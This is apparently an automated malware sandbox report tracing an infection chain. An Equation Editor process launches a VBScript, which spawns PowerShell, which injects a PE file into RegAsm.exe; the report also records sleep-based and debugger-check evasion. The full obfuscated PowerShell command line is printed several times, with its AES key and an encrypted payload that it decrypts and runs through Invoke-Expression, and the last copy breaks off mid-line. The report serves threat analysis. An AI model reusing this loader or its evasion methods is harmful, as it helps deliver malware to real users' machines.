                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Delayed program exit found
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F7A7 Sleep,ExitProcess,8_2_0040F7A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_0041A748
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1427Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1635Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2712Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3184Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3188Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3188Thread sleep time: -3600000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3188Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3248Thread sleep count: 248 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3248Thread sleep time: -124000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3252Thread sleep count: 139 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3252Thread sleep time: -417000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3304Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3252Thread sleep count: 9359 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3252Thread sleep time: -28077000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_00409253
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041C291
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C34D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_00409665
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044E879 FindFirstFileExA,8_2_0044E879
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_0040880C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040783C FindFirstFileW,FindNextFileW,8_2_0040783C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419AF5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD37
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00407C97
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_8-49170
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_004349F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004432B5 mov eax, dword ptr fs:[00000030h]8_2_004432B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00412077 GetProcessHeap,HeapFree,8_2_00412077
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00434B47 SetUnhandledExceptionFilter,8_2_00434B47
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_004349F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0043BB22
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00434FDC

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
                Injects a PE file into a foreign processes
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe8_2_004120F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00419627 mouse_event,8_2_00419627
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni87355924191917571657221755980918cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cniunstmxui0hgfw3fdm1ert/tun0ubdloiqyhjlmxqihnecjctgq65plkspfurkcdrjeph4ihki2ib6ldmk9phm3xxkeni+fcksxpwgqqchotbxmi5gehoxzdilkulsmhsrgtrat4hlirjclijfhhppopad8wrrnjoaupibq8ljkcbyxn79xvshb07yd11fez/xbrm4eb0d6odjgtxhylrzf6j4efba9grgmdc4tkwy2zlmyr0bfez+txcikx6moawodsdqcjz8w7gbp0wx7cdbpibhixab4r+prvgaccg+0+3uep7n/ketdvanulujk7wm0vfcbyd/wvrtzf4youzwmoc3oacf/jrshl+say08x0qppscnvwz86ojjuoepgjsv67aspbpc+mt7exhdg3nzcev9ovnfyyq2mja+oyhp/f7vijb0t7gbdynwme4hifbgrkzkghh0vlgzbfsozqmmnyatrwwng1stwukeon1tmwo+gg02ry5xyl9dvsfohoro3yjn0n+knyfsitsld8vprgssvo3vdtrx83pc61aekuwgmokozlk3nzebypc+p8jh/rc5lwja5zr77tsv/3ml20f7os9kdmcybjegjeqbi2go74vj2welc1ow7mmkvohzmjpl4lbdccde3+rcmbilqbycalcm5aunss21ha2+mb9sy0fop8ez4uefmsux1rlq2l4c8nimjoagijgqysi/8/4pvnnd/sdhqf9jv/rjy+djdtvgcjd3eg+777e0i3zy2wwu4edo5corcrrao0qh5kucez0fy+pfnv3ycp5njlg3ee0phzw6smpaer25mwo6sdwnn/dbc6kjxcnudmbo0nsge1naamlvsvxyb09sotlfoqfki1htvgxntwgomcwso9fqjz6v2g6lgaw0fsjkoc9ekynuz2i6adevqhjebtb0xhr2feqyelq/pzpkskekgit2hk3lviwcmienjwqnjfen61s15yu2edgjit9mn3n8vslm2edkyhvsdcmrf7gu/p8wb6oknxnhosycbbbfwxbrtzltr07jaiq87pigqkxkltip+st5jln1rkhuvinakangwfm28rb84mkuqgixbyiubzntatp97cvhahwn4pxpi1kez7/kbaddkxcvvkn3tk4hlxc8ot+rpc8cczkwpzacgoszxk3wprlhnyjtq6zn0qe6sroqcie3ffggvicerreowxqvbpiw9usza17osc636m5zxstoqghiyakm/ddk+whfmdjgisve2wrgdtoq0qt+tggtb9bi3fkjgvpbcuwm1jpuhv/lpydidnqeldtlskziqiivm6lt/byy7al9k4rbqb6ijepuxyhndju46lxfgrasgd2xga6ahtgriacii6eaxgjsunerp5ivok6tfqctmutwbb720zk5bpukq==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crep
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 